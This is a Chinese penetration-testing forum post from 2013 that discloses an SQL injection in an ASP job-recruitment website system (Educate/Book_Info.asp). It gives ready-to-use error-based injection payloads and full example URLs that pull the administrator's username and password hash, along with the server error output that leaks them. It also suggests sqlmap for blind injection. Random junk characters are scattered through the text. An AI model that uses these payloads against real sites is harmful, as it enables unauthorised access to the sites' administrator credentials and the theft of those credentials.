中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp " Y$ R4 a8 f* X% i6 x

: N1 R  p0 b1 h3 X此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
# W# I& J5 }8 ^
- L; [/ X, P  j1 q$ jexp:如下* W3 K! c. o% {& o" F6 Y3 `
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper). ~* {' _. e# y: W( q7 M' C# f% ]
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)3 D5 z. l( W4 S9 i+ W8 P- p- Q' [

" |% H0 X& ~4 Y, Y- _http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 k2 T  ^" l% |- C8 K; R7 c
# h. b3 v& c. A1 S% W
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'7 K5 `, o. e# t; ~
, f  U; q8 A1 f+ @, o9 k4 \/ Q
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
  D4 F8 C" [, o- p3 z+ B * l, t. x' A+ O/ b3 @- }! k
/Educate/Book_Info.asp,行 8
0 q  {. T9 O! {7 k
3 J+ Q( m; ?2 Ghttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper): c" n1 g7 W6 Z- F
* P2 n5 {( f+ L8 k2 U5 `9 s
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
$ R3 c0 G1 F  ^4 H" k, c4 X1 l   D4 N. a9 B0 r. N; l
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。# g3 c% C6 N! J9 [, s% i0 G
' p- Y! Q6 L& P; x: X
/Educate/Book_Info.asp,行 8
% P) `% X1 U' l- a# z2 A




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2